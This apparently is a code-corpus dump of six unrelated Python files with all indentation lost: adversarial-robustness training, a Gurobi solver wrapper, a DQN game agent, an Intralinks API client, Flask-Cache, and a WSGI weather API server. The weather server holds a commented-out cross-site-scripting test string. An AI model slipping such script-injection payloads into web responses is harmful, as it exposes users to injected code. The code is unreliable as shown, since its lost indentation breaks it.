correct += ((1-flip).byte().view(1, -1) * predicted.eq(targets)).sum().item()
acc = 100. * correct / total
return train_loss, acc
def test(net, basic_net, testloader, config, params, out_dir, attack, evaluate=False, log=False):
# Set device
device = 'cuda' if torch.cuda.is_available() else 'cpu'
net.eval()
adv_correct = 0
natural_correct = 0
total = 0
results = {}
with torch.no_grad():
iterator = tqdm(testloader, ncols=0, leave=False)
for batch_idx, (inputs, targets) in enumerate(iterator):
# ### Debug
# if batch_idx > 0:
# continue
# ###
inputs, targets = inputs.to(device), targets.to(device)
natural_outputs = basic_net(inputs)
if attack:
if evaluate:
eval_net = AttackPGD(basic_net, config, attack=True)
adv_outputs, pert_inputs = eval_net(inputs, targets)
else:
adv_outputs, pert_inputs = net(inputs, targets)
else:
adv_outputs = natural_outputs
_, adv_predicted = adv_outputs.max(1)
_, natural_predicted = natural_outputs.max(1)
natural_correct += natural_predicted.eq(targets).sum().item()
adv_correct += adv_predicted.eq(targets).sum().item()
total += targets.size(0)
robust_acc = 100. * adv_correct / total
natural_acc = 100. * natural_correct / total
results['Robust acc'] = robust_acc
results['Clean acc'] = natural_acc
if log:
test_log(out_dir, params, results)
return natural_acc, robust_acc
def get_data_sets(dataset, poormin=False):
if dataset == "MNIST":
# Clean data
channels = 1
transform_train = transforms.Compose([
transforms.ToTensor()
])
transform_test = transforms.Compose([
transforms.ToTensor()
])
trainset_clean = torchvision.datasets.MNIST(root='./data', train=True, download=True,
transform=transform_train)
testset = torchvision.datasets.MNIST(root='./data', train=False, download=True,
transform=transform_test)
# Flipped
transform_train = transforms.Compose([
transforms.RandomHorizontalFlip(p=1),
transforms.ToTensor()
])
trainset_flip = torchvision.datasets.MNIST(root='./data', train=True, download=True,
transform=transform_train)
elif dataset == "CIFAR10":
# Clean data
channels = 3
if not poormin:
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
else:
transform_train = transforms.Compose([
transforms.ToTensor()
])
transform_test = transforms.Compose([
transforms.ToTensor()
])
trainset_clean = torchvision.datasets.CIFAR10(root='./data', train=True, download=True,
transform=transform_train)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True,
transform=transform_test)
# Flipped
transform_train = transforms.Compose([
transforms.RandomHorizontalFlip(p=1),
transforms.ToTensor()
])
trainset_flip = torchvision.datasets.CIFAR10(root='./data', train=True, download=True,
transform=transform_train)
else:
print("Dataset not yet implemented. Terminating.")
return
# Combined
trainset = AugmentedDataset(trainset_clean, trainset_flip)
if not poormin:
trainloader = torch.utils.data.DataLoader(AugmentedDataset(trainset_clean), batch_size=128)
testloader = torch.utils.data.DataLoader(testset, batch_size=128)
else:
trainloader = torch.utils.data.DataLoader(trainset, batch_size=1024)
testloader = torch.utils.data.DataLoader(testset, batch_size=128)
return trainloader, testloader, channels
|
<filename>src_py/solver_interfaces/solver_gurobi.py
import math
from gurobipy import *
from solver_interfaces.solver_abstract import AbstractSolver, AbstractCallback
setParam('OutputFlag', 0)
setParam('LazyConstraints', 1)
class SolverGurobi(AbstractSolver):
solver_name = 'Gurobi'
def __init__(self, name):
self.m = Model(name)
self.callback = None
@staticmethod
def get_solver_name():
return SolverGurobi.solver_name
@staticmethod
def check_integrality():
return False
def add_vars(self, collection: {dict, list}):
keys = None
if isinstance(collection, dict):
keys = collection.keys()
elif isinstance(collection, list):
keys = collection
new_vars = self.m.addVars(keys, vtype=GRB.BINARY)
return new_vars
def set_objective_list(self, obj_list: list):
self.m.setObjective(quicksum(obj_list), sense=GRB.MAXIMIZE)
def add_constr_eq(self, expr, rhs: float):
self.m.addConstr(expr == rhs)
def add_constr_le(self, expr, rhs: float):
self.m.addConstr(expr <= rhs)
def add_constr_ge(self, expr, rhs: float):
self.m.addConstr(expr >= rhs)
def add_sos_constr(self, var_list, weights):
self.m.addSOS(GRB.SOS_TYPE1, var_list, weights)
@staticmethod
def quick_sum(var_list):
return quicksum(var_list)
def solve(self, timeout=math.inf):
def callback_function(model, where):
data = [model, where]
if self.callback is None or where not in self.callback.reasons_dict.keys():
return
violated = self.callback.function(data)
return
self.m.setParam('TimeLimit', timeout)
self.m.optimize(callback_function)
optimal = self.m.Status == GRB.OPTIMAL
return self.m.objVal, optimal
def get_objective_value(self):
return self.m.objVal
@staticmethod
def get_val(collection: tupledict) -> dict:
vars_val = {key: v.X for key, v in collection.items()}
return vars_val
def set_callbacks(self, function, lazy=True, cut=True):
reasons_dict = dict()
if lazy:
reasons_dict[GRB.Callback.MIPSOL] = "GRB.Callback.MIPSOL"
if cut:
reasons_dict[GRB.Callback.MIPNODE] = "GRB.Callback.MIPNODE"
self.callback = CallbackGurobi(self, function, reasons_dict)
return
def get_n_vars(self):
return self.m.NumVars
def get_n_constrs(self):
return self.m.NumConstrs
def update(self):
self.m.update()
class CallbackGurobi(AbstractCallback):
def __init__(self, model, function, reasons_dict):
self.model = model
self.function = function
self.reasons_dict = reasons_dict
return
def get_val(self, collection: tupledict, data) -> dict:
model, where = data
indices = list(collection.keys())
vars_list = [collection[key] for key in indices]
# TODO: test extensively if this is the correct flow for callbacks
if where == GRB.Callback.MIPNODE:
status = model.cbGet(GRB.Callback.MIPNODE_STATUS)
values_list = model.cbGetNodeRel(vars_list)
# if status == GRB.OPTIMAL:
# values_list = model.cbGetNodeRel(vars_list)
# else:
# values_list = model.cbGetNodeRel(vars_list)
# return None
elif where == GRB.Callback.MIPSOL:
values_list = model.cbGetSolution(vars_list)
else:
values_list = model.cbGetSolution(vars_list)
return {key: values_list[i] for i, key in enumerate(indices)}
@staticmethod
def add_constr(expr, data):
model, where = data
if where == GRB.Callback.MIPNODE:
model.cbCut(expr)
elif where == GRB.Callback.MIPSOL:
model.cbLazy(expr)
def add_constr_le(self, expr, rhs, data):
self.add_constr(expr <= rhs, data)
def add_constr_eq(self, expr, rhs: float, data):
self.add_constr(expr == rhs, data)
def add_constr_ge(self, expr, rhs: float, data):
self.add_constr(expr >= rhs, data)
|
<filename>src/agent.py
import torch
from torch import nn
from collections import namedtuple
import random
import numpy as np
import cv2
from torch.optim.lr_scheduler import StepLR
import matplotlib.pyplot as plt
from collections import deque
import PIL.Image as Image
class Network(nn.Module):
def __init__(self, in_channels=4):
super(Network, self).__init__()
self.feature_dim = 512
self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
nn.init.kaiming_normal_(self.conv1.weight)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
nn.init.kaiming_normal_(self.conv2.weight)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
nn.init.kaiming_normal_(self.conv3.weight)
self.fc4 = nn.Linear(7 * 7 * 64, self.feature_dim)
nn.init.kaiming_normal_(self.fc4.weight)
self.out = nn.Linear(self.feature_dim,3)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.conv1(x))
x = self.relu(self.conv2(x))
x = self.relu(self.conv3(x))
x = x.view(x.shape[0], -1)
x = self.relu(self.fc4(x))
out = self.out(x)
return out
device = "cuda"
class Agent(object):
def __init__(self, player_id=1):
self.network = Network().to(device)
self.target_network = Network().to(device)
self.player_id = player_id
self.optimizer = torch.optim.RMSprop(self.network.parameters(), lr=0.0001)
self.memory = ReplayMemory(40000)
self.batch_size = 32
self.frame_number = 4
self.frames = np.zeros((84,84,self.frame_number))
self.start = True
self.epsilon = 0.0005
self.discount = .99
self.random_start_iter = 0
self.params = self.network.parameters()
def update_network(self):
"""
Optimize the network accordingly with the experience
"""
if len(self.memory) < self.batch_size:
return
transitions = self.memory.sample(self.batch_size)
batch = Transition(*zip(*transitions))
non_final_mask = ~torch.tensor(batch.done, dtype=torch.bool)
non_final_next_states = [s for nonfinal, s in zip(non_final_mask,
batch.next_frame) if nonfinal > 0]
non_final_next_states = torch.stack(non_final_next_states).float().to(device)
state_batch = torch.stack(batch.frame).float().to(device)
action_batch = torch.cat(batch.action).long().to(device)
reward_batch = torch.cat(batch.reward).float().to(device)
actions = torch.nn.functional.one_hot(action_batch.view(-1),3)
state_action_values = (self.network(state_batch/255.0)* actions).sum(1)#.gather(1, action_batch)
next_state_values = torch.zeros(self.batch_size,device=device)
next_state_values[non_final_mask] = self.target_network(non_final_next_states/255.0).max(1)[0].detach()
expected_state_action_values = reward_batch + self.discount * next_state_values
self.optimizer.zero_grad()
loss = nn.functional.smooth_l1_loss(state_action_values.squeeze(),
expected_state_action_values)
loss.backward()
self.optimizer.step()
def store_memory(self,state, action, next_state, reward, done):
"""
Method to store in memory an specific observation, action, reward to be used later on
"""
img = Image.fromarray(next_state)
img = img.convert("L")
next_state = img.resize((84, 84), Image.NEAREST)
next_state = np.reshape(next_state, (1, 84, 84))
action = torch.tensor([[action]],dtype=torch.int8)
if reward > 0:
reward = 1
elif reward < 0:
reward = -1
reward = torch.tensor([reward], dtype=torch.int8)
next_state = torch.from_numpy(
np.append(next_state, self.frames[:(self.frame_number-1), :, :], axis=0)).type(torch.uint8)
frames = torch.from_numpy(self.frames).short().type(torch.uint8)
self.memory.push(frames,action, next_state ,reward,done)
def load_model(self):
"""
Loads a trained model from a file
"""
weights = torch.load("model.mdl")
self.network.load_state_dict(weights, strict=False)
def get_action(self, observation) -> int:
"""
Runs the network and selects an action to perform
:return: the action to be performed
"""
img = Image.fromarray(observation)
img = img.convert("L")
observation = img.resize((84, 84), Image.NEAREST)
if self.start:
observation = np.reshape(observation, (84, 84))
self.start = False
self.frames = np.stack((observation, observation, observation, observation), axis=0)
else:
observation = np.reshape(observation, (1, 84, 84))
self.frames = np.append(observation, self.frames[:(self.frame_number-1), :, :], axis=0)
if self.random_start_iter > 0:
self.random_start_iter -= 1
action = np.random.randint(3)
else:
if np.random.random() < self.epsilon:
action = random.randrange(3)
else:
action = self.network(torch.tensor(self.frames.reshape((1,self.frame_number,84,84)),dtype=torch.float32,device=device)/255.0)
_,action = torch.max(action,dim=1)
action = int(action.item())
return action
def get_name(self) -> str:
"""
Function to get the group name
:return: group name
"""
return "NETO_21"
def reset(self):
"""
Function to reset the agent state after each episode
"""
self.frames = np.zeros((84,84,self.frame_number))
self.start = True
self.appended_frame = 0
def update_target_network(self):
self.target_network.load_state_dict(self.network.state_dict())
Transition = namedtuple('Transition',
('frame', 'action', 'next_frame', 'reward', 'done'))
class ReplayMemory(object):
def __init__(self, capacity):
self.capacity = capacity
self.memory = []
self.position = 0
self.full_warning = True
def push(self, *args):
if len(self.memory) < self.capacity:
self.memory.append(None)
else:
if self.full_warning:
print("Memory Full")
self.full_warning = False
self.memory[self.position] = Transition(*args)
self.position = (self.position + 1) % self.capacity
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self):
return len(self.memory)
|
import requests
import intralinks.utils.xml
import intralinks.utils.data
import intralinks.api.logger
class ApiClient:
def __init__(self, config=None, session=None, verify_ssl=True):
self.config = config
self.session = session
self.logger = intralinks.api.logger.ApiLogger1()
self.verify_ssl = verify_ssl
def is_v1(self):
return self.config is not None and isinstance(self.config, intralinks.api.v1.Config)
def is_v2(self):
return self.config is not None and isinstance(self.config, intralinks.api.v2.Config)
def get_http_elements_v1(self, method, params=None):
http_method = {'GET':requests.get, 'DELETE':requests.post, 'CREATE':requests.post, 'UPDATE':requests.post}[method]
http_params = {'method':method, 'httpStatus':'F'}
if hasattr(self.config, 'client'):
http_params['client'] = self.config.client
if params is not None:
convert = lambda v: ('T' if v else 'F') if isinstance(v, bool) else v
http_params.update({k:convert(v) for (k, v) in params.items() if v is not None})
return http_method, http_params
def get_http_elements_v2(self, method, params):
http_method = {'GET':requests.get, 'DELETE':requests.delete, 'CREATE':requests.post, 'UPDATE':requests.put}[method]
http_params = None if params is None else {k:v for (k, v) in params.items() if v is not None}
return http_method, http_params
def get_http_elements(self, method, params, headers, authenticated, api_version):
http_headers = headers if headers else dict()
http_cookies = dict()
if authenticated:
self.session.apply(http_headers, http_cookies)
if api_version == 1:
http_method, http_params = self.get_http_elements_v1(method, params)
elif api_version == 2:
http_method, http_params = self.get_http_elements_v2(method, params)
else:
raise Exception()
return http_method, http_params, http_cookies, http_headers
def get(self, relative_url, params=None, stream=False, api_version=None):
http_method, http_params, http_cookies, http_headers = self.get_http_elements('GET', params, headers=None, authenticated=True, api_version=api_version)
response = http_method(
self.config.base_url + relative_url,
params=http_params,
cookies=http_cookies,
headers=http_headers,
stream=stream,
verify=self.verify_ssl
)
if self.logger:
self.logger.log_get(response, self.config.base_url, relative_url, http_params, http_cookies, http_headers, stream)
self.last_response = response
return ApiResponse(response)
def create(self, relative_url, params=None, data=None, files=None, headers=None, authenticated=True, api_version=None): # NOSONAR
http_method, http_params, http_cookies, http_headers = self.get_http_elements('CREATE', params, headers, authenticated=authenticated, api_version=api_version)
response = http_method(
self.config.base_url + relative_url,
params=http_params,
data=data,
files=files,
cookies=http_cookies,
headers=http_headers,
verify=self.verify_ssl
)
if self.logger:
self.logger.log_post(response, self.config.base_url, relative_url, http_params, data, http_cookies, http_headers)
self.last_response = response
return ApiResponse(response)
def update(self, relative_url, params=None, data=None, files=None, headers=None, authenticated=True, api_version=None): # NOSONAR
http_method, http_params, http_cookies, http_headers = self.get_http_elements('UPDATE', params, headers, authenticated=authenticated, api_version=api_version)
response = http_method(
self.config.base_url + relative_url,
params=http_params,
data=data,
files=files,
cookies=http_cookies,
headers=http_headers,
verify=self.verify_ssl
)
if self.logger:
self.logger.log_post(response, self.config.base_url, relative_url, http_params, data, http_cookies, http_headers)
self.last_response = response
return ApiResponse(response)
def delete(self, relative_url, params=None, data=None, headers=None, api_version=None):
http_method, http_params, http_cookies, http_headers = self.get_http_elements('DELETE', params, headers, authenticated=True, api_version=api_version)
response = http_method(
self.config.base_url + relative_url,
params=http_params,
data=data,
cookies=http_cookies,
headers=http_headers,
verify=self.verify_ssl
)
if self.logger:
self.logger.log_delete(response, self.config.base_url, relative_url, http_params, http_cookies, http_headers)
self.last_response = response
return ApiResponse(response)
class ApiResponse:
def __init__(self, response):
self.response = response
self._data = None
def data(self):
if self._data is not None:
return self._data
elif self.content_type() == 'application/json':
self._data = self.response.json()
elif self.content_type() == 'text/xml':
self._data = intralinks.utils.xml.from_xml(self.response.content)
elif self.content_type() == 'text/html':
self._data = {'error':self.response.text}
else:
self._data = self.response.text
return self._data
def dump(self, fp):
for chunk in self.response.iter_content(chunk_size=1024):
if chunk:
fp.write(chunk)
def status_code(self):
return self.response.status_code
def content_type(self):
return self.response.headers.get('Content-Type', '').split(';')[0]
def _get_error(self, d):
error = None
if 'errors' in d:
error = intralinks.utils.data.get_node_as_list(d, 'errors')[0]
elif 'error' in d:
error = intralinks.utils.data.get_node_as_list(d, 'error')[0]
elif 'fault' in d:
error = d['fault']
return error
def _raise_error(self):
d = self.data()
code = None
subcode = None
message = None
error = self._get_error(d)
if error:
if 'code' in error:
code = error['code']
if 'message' in error:
message = error['message']
elif 'description' in error:
message = error['description']
elif 'faultstring' in error:
message = error['faultstring']
if 'subCode' in error:
subcode = error['subCode']
elif 'subcode' in error:
subcode = error['subcode']
raise ApiException(code, subcode, message, self.response)
def check(self, expected_status_code, expected_content_type):
self.assert_status_code(expected_status_code)
self.assert_content_type(expected_content_type)
self.assert_no_errors()
def assert_status_code(self, expected_status_code):
if isinstance(expected_status_code, int):
expected_status_code = {expected_status_code}
if self.status_code() not in expected_status_code:
self._raise_error()
def assert_content_type(self, expected_content_type):
if isinstance(expected_content_type, str):
expected_content_type = {expected_content_type}
if self.content_type() not in expected_content_type:
raise Exception(
self.response.url,
self.response.status_code,
self.response.headers['Content-Type'],
self.response.text
)
def assert_no_errors(self, expected_code=None):
d = self.data()
if self._get_error(d):
self._raise_error()
if expected_code is not None and d['status']['code'] != expected_code:
raise Exception(
self.response.url,
self.response.status_code,
self.response.headers['Content-Type'],
self.response.text,
d
)
def assert_ok(self, expected_status_code, expected_content_type):
self.assert_status_code(expected_status_code)
self.assert_content_type(expected_content_type)
self.assert_no_errors()
class ApiException(Exception):
def __init__(self, code=None, subcode=None, message=None, request=None):
self.code = code
self.subcode = subcode
self.message = message
self.request = request
def is_user_unknown(self):
return self.subcode == '3-1'
def is_user_already_a_member(self):
return self.subcode == '5-1-1'
# '1-1-3-2', "User's current session is invalid.This may be due to session timeout or concurrent login "
|
# -*- coding: utf-8 -*-
"""
flask.ext.cache
~~~~~~~~~~~~~~
Adds cache support to your application.
:copyright: (c) 2010 by <NAME>.
:license: BSD, see LICENSE for more details
"""
__version__ = '0.7.1'
__versionfull__ = __version__
import uuid
import hashlib
import inspect
import warnings
import exceptions
from types import NoneType
from functools import wraps
from werkzeug import import_string
from werkzeug.contrib.cache import BaseCache, NullCache
from flask import request, current_app
JINJA_CACHE_ATTR_NAME = '_template_fragment_cache'
def function_namespace(f):
"""
Attempts to returns unique namespace for function
"""
if hasattr(f, 'im_func'):
return '%s.%s.%s' % (f.__module__, f.im_class.__name__, f.__name__)
else:
return '%s.%s' % (f.__module__, f.__name__)
#: Cache Object
################
class Cache(object):
"""
This class is used to control the cache objects.
"""
def __init__(self, app=None, with_jinja2_ext=True, config=None):
self.with_jinja2_ext = with_jinja2_ext
self.config = config
self.cache = None
if app is not None:
self.init_app(app)
else:
self.app = None
self._memoized = []
def init_app(self, app, config=None):
"This is used to initialize cache with your app object"
if config is not None:
self.config = config
elif self.config is None:
self.config = app.config
if not isinstance(self.config, (NoneType, dict)):
raise ValueError("`config` must be an instance of dict or NoneType")
self.config.setdefault('CACHE_DEFAULT_TIMEOUT', 300)
self.config.setdefault('CACHE_THRESHOLD', 500)
self.config.setdefault('CACHE_KEY_PREFIX', None)
self.config.setdefault('CACHE_MEMCACHED_SERVERS', None)
self.config.setdefault('CACHE_DIR', None)
self.config.setdefault('CACHE_OPTIONS', None)
self.config.setdefault('CACHE_ARGS', [])
self.config.setdefault('CACHE_TYPE', 'null')
if self.with_jinja2_ext:
setattr(app.jinja_env, JINJA_CACHE_ATTR_NAME, self)
from flask.ext.cache.jinja2ext import CacheExtension
app.jinja_env.add_extension(CacheExtension)
self.app = app
self._set_cache()
def _set_cache(self):
import_me = self.config['CACHE_TYPE']
if '.' not in import_me:
import_me = 'flask.ext.cache.backends.' + \
import_me
cache_obj = import_string(import_me)
cache_args = self.config['CACHE_ARGS'][:]
cache_options = dict(default_timeout= \
self.config['CACHE_DEFAULT_TIMEOUT'])
if self.config['CACHE_OPTIONS']:
cache_options.update(self.config['CACHE_OPTIONS'])
self.cache = cache_obj(self.app, self.config, cache_args, cache_options)
if not isinstance(self.cache, BaseCache):
raise TypeError("Cache object must subclass "
"werkzeug.contrib.cache.BaseCache")
def get(self, *args, **kwargs):
"Proxy function for internal cache object."
return self.cache.get(*args, **kwargs)
def set(self, *args, **kwargs):
"Proxy function for internal cache object."
self.cache.set(*args, **kwargs)
def add(self, *args, **kwargs):
"Proxy function for internal cache object."
self.cache.add(*args, **kwargs)
def delete(self, *args, **kwargs):
"Proxy function for internal cache object."
self.cache.delete(*args, **kwargs)
def delete_many(self, *args, **kwargs):
"Proxy function for internal cache object."
self.cache.delete_many(*args, **kwargs)
def cached(self, timeout=None, key_prefix='view/%s', unless=None):
"""
Decorator. Use this to cache a function. By default the cache key
is `view/request.path`. You are able to use this decorator with any
function by changing the `key_prefix`. If the token `%s` is located
within the `key_prefix` then it will replace that with `request.path`
Example::
# An example view function
@cache.cached(timeout=50)
def big_foo():
return big_bar_calc()
# An example misc function to cache.
@cache.cached(key_prefix='MyCachedList')
def get_list():
return [random.randrange(0, 1) for i in range(50000)]
my_list = get_list()
.. note::
You MUST have a request context to actually called any functions
that are cached.
.. versionadded:: 0.4
The returned decorated function now has three function attributes
assigned to it. These attributes are readable/writable.
**uncached**
The original undecorated function
**cache_timeout**
The cache timeout value for this function. For a custom value
to take affect, this must be set before the function is called.
**make_cache_key**
A function used in generating the cache_key used.
:param timeout: Default None. If set to an integer, will cache for that
amount of time. Unit of time is in seconds.
:param key_prefix: Default 'view/%(request.path)s'. Beginning key to .
use for the cache key.
.. versionadded:: 0.3.4
Can optionally be a callable which takes no arguments
but returns a string that will be used as the cache_key.
:param unless: Default None. Cache will *always* execute the caching
facilities unless this callable is true.
This will bypass the caching entirely.
"""
def decorator(f):
@wraps(f)
def decorated_function(*args, **kwargs):
#: Bypass the cache entirely.
if callable(unless) and unless() is True:
return f(*args, **kwargs)
cache_key = decorated_function.make_cache_key(*args, **kwargs)
rv = self.cache.get(cache_key)
if rv is None:
rv = f(*args, **kwargs)
self.cache.set(cache_key, rv,
timeout=decorated_function.cache_timeout)
return rv
def make_cache_key(*args, **kwargs):
if callable(key_prefix):
cache_key = key_prefix()
elif '%s' in key_prefix:
cache_key = key_prefix % request.path
else:
cache_key = key_prefix
cache_key = cache_key.encode('utf-8')
return cache_key
decorated_function.uncached = f
decorated_function.cache_timeout = timeout
decorated_function.make_cache_key = make_cache_key
return decorated_function
return decorator
def _memvname(self, funcname):
return funcname + '_memver'
def memoize_make_version_hash(self):
return uuid.uuid4().bytes.encode('base64')[:6]
def memoize_make_cache_key(self, fname, make_name=None):
"""
Function used to create the cache_key for memoized functions.
"""
def make_cache_key(f, *args, **kwargs):
version_key = self._memvname(fname)
version_data = self.cache.get(version_key)
if version_data is None:
version_data = self.memoize_make_version_hash()
self.cache.set(version_key, version_data)
cache_key = hashlib.md5()
#: this should have to be after version_data, so that it
#: does not break the delete_memoized functionality.
if callable(make_name):
altfname = make_name(fname)
else:
altfname = fname
if callable(f):
args, kwargs = self.memoize_kwargs_to_args(f, *args, **kwargs)
try:
updated = "{0}{1}{2}".format(altfname, args, kwargs)
except AttributeError:
updated = "%s%s%s" % (altfname, args, kwargs)
cache_key.update(updated)
cache_key = cache_key.digest().encode('base64')[:16]
cache_key += version_data
return cache_key
return make_cache_key
def memoize_kwargs_to_args(self, f, *args, **kwargs):
#: Inspect the arguments to the function
#: This allows the memoization to be the same
#: whether the function was called with
#: 1, b=2 is equivilant to a=1, b=2, etc.
new_args = []
arg_num = 0
m_args = inspect.getargspec(f)[0]
for i in range(len(m_args)):
if i == 0 and m_args[i] in ('self', 'cls'):
continue
if m_args[i] in kwargs:
new_args.append(kwargs[m_args[i]])
elif arg_num < len(args):
new_args.append(args[arg_num])
arg_num += 1
return tuple(new_args), {}
def memoize(self, timeout=None, make_name=None, unless=None):
"""
Use this to cache the result of a function, taking its arguments into
account in the cache key.
Information on
`Memoization <http://en.wikipedia.org/wiki/Memoization>`_.
Example::
@cache.memoize(timeout=50)
def big_foo(a, b):
return a + b + random.randrange(0, 1000)
.. code-block:: pycon
>>> big_foo(5, 2)
753
>>> big_foo(5, 3)
234
>>> big_foo(5, 2)
753
.. versionadded:: 0.4
The returned decorated function now has three function attributes
assigned to it.
**uncached**
The original undecorated function. readable only
**cache_timeout**
The cache timeout value for this function. For a custom value
to take affect, this must be set before the function is called.
readable and writable
**make_cache_key**
A function used in generating the cache_key used.
readable and writable
:param timeout: Default None. If set to an integer, will cache for that
amount of time. Unit of time is in seconds.
:param make_name: Default None. If set this is a function that accepts
a single argument, the function name, and returns a
new string to be used as the function name. If not set
then the function name is used.
:param unless: Default None. Cache will *always* execute the caching
facilities unelss this callable is true.
This will bypass the caching entirely.
.. versionadded:: 0.5
params ``make_name``, ``unless``
"""
def memoize(f):
@wraps(f)
def decorated_function(*args, **kwargs):
#: bypass cache
if callable(unless) and unless() is True:
return f(*args, **kwargs)
cache_key = decorated_function.make_cache_key(f, *args, **kwargs)
rv = self.cache.get(cache_key)
if rv is None:
rv = f(*args, **kwargs)
self.cache.set(cache_key, rv,
timeout=decorated_function.cache_timeout)
return rv
fname = function_namespace(f)
decorated_function.uncached = f
decorated_function.cache_timeout = timeout
decorated_function.make_cache_key = self.memoize_make_cache_key(fname,
make_name)
decorated_function.delete_memoized = lambda: self.delete_memoized(f)
return decorated_function
return memoize
def delete_memoized(self, fname, *args, **kwargs):
"""
Deletes the specified functions caches, based by given parameters.
If parameters are given, only the functions that were memoized with them
will be erased. Otherwise all the versions of the caches will be deleted.
Example::
@cache.memoize(50)
def random_func():
return random.randrange(1, 50)
@cache.memoize()
def param_func(a, b):
return a+b+random.randrange(1, 50)
.. code-block:: pycon
>>> random_func()
43
>>> random_func()
43
>>> cache.delete_memoized('random_func')
>>> random_func()
16
>>> param_func(1, 2)
32
>>> param_func(1, 2)
32
>>> param_func(2, 2)
47
>>> cache.delete_memoized('param_func', 1, 2)
>>> param_func(1, 2)
13
>>> param_func(2, 2)
47
:param fname: Name of the memoized function, or a reference to the function.
:param \*args: A list of positional parameters used with memoized function.
:param \**kwargs: A dict of named parameters used with memoized function.
.. note::
Flask-Cache uses inspect to order kwargs into positional args when
the function is memoized. If you pass a function reference into ``fname``
instead of the function name, Flask-Cache will be able to place
the args/kwargs in the proper order, and delete the positional cache.
However, if ``delete_memozied`` is just called with the name of the
function, be sure to pass in potential arguments in the same order
as defined in your function as args only, otherwise Flask-Cache
will not be able to compute the same cache key.
.. note::
Flask-Cache maintains an internal random version hash for the function.
Using delete_memoized will only swap out the version hash, causing
the memoize function to recompute results and put them into another key.
This leaves any computed caches for this memoized function within the
caching backend.
It is recommended to use a very high timeout with memoize if using
this function, so that when the version has is swapped, the old cached
results would eventually be reclaimed by the caching backend.
"""
if callable(fname):
assert hasattr(fname, 'uncached')
f = fname.uncached
_fname = function_namespace(f)
else:
f = None
_fname = fname
#: print import_string(_fname)
raise exceptions.DeprecationWarning("Deleting messages by relative name is no longer"
" reliable, please switch to a function reference"
" or use the full function import name")
if not args and not kwargs:
version_key = self._memvname(_fname)
version_data = self.memoize_make_version_hash()
self.cache.set(version_key, version_data)
else:
cache_key = fname.make_cache_key(f, *args, **kwargs)
self.cache.delete(cache_key)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import re
import json
from datetime import datetime
from sample_weather_api_caller import SampleWeatherAPICaller, CityNotFoundError
from real_weather_api_caller import RealWeatherAPICaller
from urllib.parse import parse_qs
import threading
fake = False
# data source of city weather
cw_source = RealWeatherAPICaller()
if fake:
print("Fake mode now, use SampleWeatherAPICaller as source")
cw_source = SampleWeatherAPICaller() # fake one
# handlers for errors
def city_not_found(environ, start_response):
status = '404 Not Found'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
# ret = [("%s: %s\n" % (key, value)).encode("utf-8")
# for key, value in environ.items()]
# return ret
return ["404 City not found".encode("utf-8")]
# intended use for data source error, currently should only be used when forced error
def internal_error(environ, start_response):
status = '500 System Errors'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
return ["500 System Errors".encode("utf-8")]
def general_value_error(environ, start_response):
status = '400 Bad Request'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
error_msg = environ["custom_error_message"]
return [error_msg.encode("utf-8")]
def not_found(environ, start_response):
start_response('404 Not Found', [('Content-Type', 'text/plain')])
# ret = [("%s: %s\n" % (key, value)).encode("utf-8")
# for key, value in environ.items()]
# return ret
return ['404 Page Not Found'.encode("utf-8")]
def favicon(environ, start_response):
status = '200 OK'
headers = [('Content-type', "data:image/png;")]
with open("favicon.ico", 'br') as file:
f = file.read()
start_response(status, headers)
return [f]
def city_weather_full_view(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'application/json; charset=utf-8')]
try:
data_source = cw_source
# parse query string
q_s = environ.get('QUERY_STRING')
if not q_s:
raise ValueError("Please provide parameter of city, start and end")
query = parse_qs(q_s, strict_parsing=True)
# normally will raise if there is no query string, but we handled it above
for k,v in query.items():
# only want 1 thing from query string
query[k] = v[0]
start = query.get("start")
end = query.get("end")
city_short_name = query.get("city")
if (start is None) or (end is None):
raise ValueError("Need both start and end date")
start = datetime.strptime(start, "%Y-%m-%dT%H:%M:%S")
end = datetime.strptime(end, "%Y-%m-%dT%H:%M:%S")
if start > end:
raise ValueError("Start time is after End time")
if (city_short_name is None):
raise ValueError("City shortname is not provided")
city_short_name = city_short_name.lower()
# get city weather data
data = data_source.get_db_records(city_short_name, start, end)
# output
start_response(status, headers)
return [json.dumps(data).encode("utf-8")]
# Custom errors
except CityNotFoundError:
return city_not_found(environ, start_response)
except ValueError as e:
environ["custom_error_message"] = repr(e)
return general_value_error(environ, start_response)
class APIApplication(object):
def __init__(self, application):
self.application = application
self.setup_routes()
def setup_routes(self):
# map route to a view
self.routes = [
# e.g. /weather
(r'^\/weather$', city_weather_full_view),
(r'^\/favicon.ico', favicon)
]
def __call__(self, environ, start_response):
# main logic for the API Application
# parse path, then fail/show object
# https://bugs.python.org/issue16679
# Can't deal with unicode directly, needs to be ISO-8859-1 -> Byte -> Unicode
path = environ.get('PATH_INFO')
npath = bytearray(path, 'iso-8859-1').decode('utf8')
handler = self.find_route(npath)
return handler(environ, start_response)
def find_route(self, path):
# no checking for conflicting routes currently
for (pattern, handler) in self.routes:
if re.compile(pattern, re.UNICODE).search(path):
return handler
return not_found
def simple_app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain; charset=utf-8')]
start_response(status, headers)
# won't execute in browser anyway, not really a JSON object, but whatever
# return ["<script>alert('hacked world')</script>\n".encode("utf-8")]
# for debugging
ret = [("%s: %s\n" % (key, value)).encode("utf-8")
for key, value in environ.items()]
return ret
def keep_retrieve_data():
print("Going to retrieve data from external source now")
cw_source.retrieve_data()
# Minor note: cannot use kwargs to set Timer to daemon, will raise unknown keyword error
# But Timer is a subclass of Thread ...
t = threading.Timer(630.0, keep_retrieve_data)
if fake:
print("Fake mode now, can repeat retrieve data in every 30 secs")
t = threading.Timer(30.0, keep_retrieve_data) # for fake one
t.daemon = True
t.start()
if __name__ == '__main__':
print("WARNING: Keep restarting server when fake is False can result in BAN of the API Key")
